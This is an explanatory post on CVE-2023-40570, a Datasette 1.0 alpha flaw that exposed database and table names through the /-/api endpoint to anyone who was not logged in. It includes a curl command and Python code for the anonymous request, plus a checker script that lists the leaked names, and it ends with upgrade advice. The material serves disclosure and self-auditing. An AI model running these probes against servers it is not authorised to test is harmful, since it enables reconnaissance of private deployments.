CVE-2023-40570 - Datasette’s `/-/api` Endpoint Leaked Database and Table Names (Explained)
Datasette is a widely used open source tool for exploring and publishing data, from small CSV files to large SQLite archives, straight to the web. A vulnerability surfaced in its 1.0 alpha releases that put private information at risk, even for operators who believed their data was safely behind authentication. That is what CVE-2023-40570 is about.
This post will walk you through what happened, why it was a risk, who was impacted, and how to fix or exploit the issue for learning purposes. Let’s dive right in!
What is CVE-2023-40570?
CVE-2023-40570 is a vulnerability in the Datasette 1.0 alpha releases 1.0a0, 1.0a1, 1.0a2 and 1.0a3. If you hosted Datasette online and protected it with a login plugin like datasette-auth-passwords, you probably expected your data to be hidden from the public.
Here’s the catch:
Anyone, logged in or not, could visit the API explorer endpoint /-/api and see a list of your database names and table names. Actual data (rows and columns) was *not* exposed, but database and table names on their own hand an attacker a map of what to go after next.
Why Does This Matter?
- Database and table names often reveal a lot: e.g., a table named user_passwords or orders_2022 can give clues about database structure, data purpose, or hints for guessing table access endpoints.
- Reconnaissance: leaked internal names make later steps easier, such as guessing table URLs, picking targets for brute-force or credential attacks, and crafting queries once any level of access is obtained.
- Privacy: In sensitive deployments—like internal company data or protected research—just the *names* of datasets might be confidential.
Patched: Datasette 1.0a4 and above
The bug lives in the API explorer endpoint:
https://your-datasette-server/-/api
This route was introduced to help users discover endpoints—handy, but in authenticated setups, it should be protected.
> CAUTION: Only instances that restrict who may view their databases and tables (for example with an authentication plugin like datasette-auth-passwords) and are reachable online are directly impacted. A fully public instance, where anyone can already browse every table, leaks nothing new through /-/api.
Exploiting CVE-2023-40570 (For Ethical Testing)
Suppose a company runs a private Datasette at https://data.example.com, and you know they require logins for access.
How would you discover their database and tables?
Just open your browser or use curl and hit the endpoint with no cookies or credentials:
```bash
curl https://data.example.com/-/api
```
Or, in Python:
```python
import requests

# No session cookie or credentials are sent: this is the anonymous view
response = requests.get('https://data.example.com/-/api')
print(response.status_code)
print(response.text)
```
Illustrative output (no login required; the database and table names below are made-up examples, and the layout of a real response may differ):
```json
{
  "databases": [
    {
      "name": "main",
      "tables": [
        "users",
        "orders_2022",
        "projects",
        "internal_notes"
      ]
    },
    {
      "name": "marketing",
      "tables": [
        "contacts",
        "campaigns"
      ]
    }
  ]
}
```
No password, no login—just the list, plain and simple.
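To turn that manual check into something you can run against your own deployments, here is an added example script (not part of the original post and not Datasette's own tooling). It requests /-/api with no credentials using only the Python standard library, then classifies the answer. It assumes that an exposed instance answers with JSON of the shape illustrated above (a real page may be laid out differently, in which case the script reports the endpoint as merely reachable for manual inspection) and that a patched or otherwise protected instance answers 401 or 403; the sample body embedded in the script is constructed, not captured from a real server.

```python
"""Check whether a Datasette instance answers /-/api to an anonymous client.

Added example for this post; not Datasette's own code or tooling.
Assumes the JSON shape shown in the post's illustration for an exposed
instance, and that a patched/protected instance answers 401 or 403.
"""
from __future__ import annotations

import json
import sys
import urllib.error
import urllib.request

# Constructed sample body mirroring the post's illustration (not captured
# from a real deployment).
SAMPLE_EXPOSED_BODY = json.dumps({
    "databases": [
        {"name": "main", "tables": ["users", "orders_2022", "projects", "internal_notes"]},
        {"name": "marketing", "tables": ["contacts", "campaigns"]},
    ]
})


def names_from_body(body: str) -> dict[str, list[str]]:
    """Map database name -> table names from a JSON body of the assumed shape.

    Returns an empty dict when the body is not JSON of that shape, so the
    caller can tell "reachable" apart from "reachable and leaking names".
    """
    try:
        data = json.loads(body)
        return {
            db["name"]: [str(t) for t in db.get("tables", [])]
            for db in data["databases"]
        }
    except (ValueError, TypeError, AttributeError, KeyError):
        return {}


def classify(status: int, body: str) -> tuple[str, dict[str, list[str]]]:
    """Turn an anonymous /-/api response into a verdict.

    protected   - 401/403: the explorer refuses anonymous access (fixed behaviour)
    not-present - 404: no API explorer at all (for example a pre-1.0 release)
    exposed     - 200 with database/table names readable by anyone
    reachable   - 200 but no names recovered from the body; inspect it by hand
    """
    if status in (401, 403):
        return "protected", {}
    if status == 404:
        return "not-present", {}
    if status == 200:
        names = names_from_body(body)
        return ("exposed" if names else "reachable"), names
    return f"unexpected-{status}", {}


def fetch_api_explorer(base_url: str, timeout: float = 10.0) -> tuple[int, str]:
    """GET <base_url>/-/api with no cookies or credentials; return (status, body).

    urllib raises HTTPError for 4xx/5xx, which is exactly the case we want to
    classify rather than crash on, so it is caught and unpacked here.
    """
    url = base_url.rstrip("/") + "/-/api"
    req = urllib.request.Request(url)
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def main(argv: list[str]) -> int:
    if len(argv) != 2:
        print(f"usage: {argv[0]} https://data.example.com", file=sys.stderr)
        return 2
    status, body = fetch_api_explorer(argv[1])
    verdict, names = classify(status, body)
    print(f"{argv[1]}: HTTP {status} -> {verdict}")
    for db, tables in names.items():
        print(f"  {db}: {', '.join(tables)}")
    return 1 if verdict == "exposed" else 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it as `python check_api_explorer.py https://data.example.com`; a non-zero exit means names were readable anonymously, which makes it easy to drop into a scheduled check. Only point it at hosts you own or are authorised to test.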
How Was It Fixed?
The patch arrived with Datasette 1.0a4. The fix blocks access to the /-/api explorer for anyone who is not authenticated, matching the behavior of the rest of the app.
Now, when you hit /-/api on a patched Datasette instance, you’ll get an authentication error if you’re not logged in.
Note: This does NOT affect the core JSON APIs for reading or writing data (`/<database>/<table>.json`). Those already enforce permission checks and never revealed table or database names to unauthorised users.
Upgrade to Datasette 1.0a4 or later:
```bash
pip install -U datasette
```
- Restart your server after upgrading so the patched code is the one serving requests.
- Review your access policies: even with the fix, audit what you expose online and make sure your secrets (including database and table names) do not leak through other plugin endpoints.
---
## References and Further Reading
- GitHub Security Advisory for CVE-2023-40570
- Original Datasette changelog and release notes
- CVE Record at Mitre
- datasette-auth-passwords Plugin
---
## What’s the Takeaway?
Even well-designed, open-source data tools like Datasette can have subtle security bugs. Leaking non-sensitive things—like database and table names—might sound minor, but when combined with other info it can serve as the first crack in your system’s armor.
If you run Datasette anywhere online with authentication enabled, update ASAP, and educate your team: security is about details, not just the data.
Stay safe, stay patched!
---
*Written exclusively for security-minded Datasette users. Share and help others stay secure.*
Timeline
Published on: 08/25/2023 01:15:00 UTC
Last modified on: 08/31/2023 13:50:00 UTC